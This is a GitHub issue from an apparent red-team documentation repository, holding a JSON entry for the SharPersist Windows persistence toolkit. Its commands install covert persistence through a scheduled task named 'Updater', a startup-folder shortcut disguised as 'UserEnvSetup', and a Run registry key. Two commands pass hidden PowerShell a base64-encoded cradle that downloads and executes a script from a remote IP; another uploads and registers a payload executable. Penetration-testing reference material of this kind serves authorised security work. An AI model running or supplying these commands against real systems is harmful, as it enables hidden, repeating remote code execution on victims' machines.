Patrick-DE / RTT-Docs

Public repository for the techniques and tools shown on rtt.secdu.de
GNU Affero General Public License v3.0

New tool: SharPersist #86

Closed Patrick-DE closed 1 year ago

Patrick-DE commented 1 year ago
{
  "name": "SharPersist",
  "phases": [
    "03. Host Enumeration",
    "04. Persistence"
  ],
  "category": "",
  "stealthy": false,
  "platforms": [
    "Windows"
  ],
  "source": "https://github.com/mandiant/SharPersist",
  "description": "Windows persistence toolkit written in C#",
  "undetected": [],
  "detected": [],
  "content": "",
  "commands": [
    {
      "id": "226ea902-b239-4fba-823e-2f485af43747",
      "name": "Help",
      "description": "",
      "tag": "",
      "results": [],
      "cmd": "`-t` is the desired persistence technique.\n`-c` is the command to execute.\n`-a` are any arguments for that command.\n`-n` is the name of the task.\n`-m` is to add the task (you can also `remove`, `check` and `list`).\n`-o` is the task frequency.\n\nStartup Folder\n`-f` is the filename to save as.\n\nRunKey\n`-k` is the registry key to modify.\n`-v` is the name of the registry key to create."
    },
    {
      "id": "6dda0d80-51eb-405a-a33e-d8c9f95f15ed",
      "name": "Create a scheduled task",
      "description": "Create a scheduled task with: Powershell x64 bit, Name: Updater, hourly execute",
      "tag": "",
      "results": [
        "COMPUTER:PERSIST:STASK"
      ],
      "cmd": "SharPersist.exe -t schtask -c \"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -a \"-nop -w hidden -enc SQBFAFgAIAAoACgAbgBlAHcALQBvAGIAagBlAGMAdAAgAG4AZQB0AC4AdwBlAGIAYwBsAGkAZQBuAHQAKQAuAGQAbwB3AG4AbABvAGEAZABzAHQAcgBpAG4AZwAoACIAaAB0AHQAcAA6AC8ALwAxADAALgAxADAALgA1AC4AMQAyADAALwBhACIAKQApAA==\" -n \"Updater\" -m add -o hourly"
    },
    {
      "id": "416b7318-d81f-45d9-a3c0-1c985e7a2178",
      "name": "Add to startup folder",
      "description": "Add to startup folder. Creates a file called UserEnvSetup in the following path: %appdata%\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\UserEnvSetup.lnk\n⚠ Consider the spaces in \"Start Menu\"",
      "tag": "",
      "results": [
        "COMPUTER:PERSIST:STARTUP"
      ],
      "cmd": "SharPersist.exe -t startupfolder -c \"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -a \"-nop -w hidden -enc SQBFAFgAIAAoACgAbgBlAHcALQBvAGIAagBlAGMAdAAgAG4AZQB0AC4AdwBlAGIAYwBsAGkAZQBuAHQAKQAuAGQAbwB3AG4AbABvAGEAZABzAHQAcgBpAG4AZwAoACIAaAB0AHQAcAA6AC8ALwAxADAALgAxADAALgA1AC4AMQAyADAALwBhACIAKQApAA==\" -f \"UserEnvSetup\" -m add\n"
    },
    {
      "id": "976759a1-0f44-44be-b510-02be55bda50c",
      "name": "Set registrykey",
      "description": "Create a new regkey with:\n* Registry key name: Updater\n* Registry key to modify: hkcurun | hkcurunonce (HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run)",
      "tag": "",
      "results": [
        "COMPUTER:PERSIST:REG"
      ],
      "cmd": "cd C:\\ProgramData\nupload C:\\Payloads\\Updater.exe\nSharPersist.exe -t reg -c \"C:\\ProgramData\\Updater.exe\" -a \"/q /n\" -k \"hkcurun\" -v \"Updater\" -m add"
    }
  ],
  "latest_commit": "2023-04-10T00:53:02Z"
}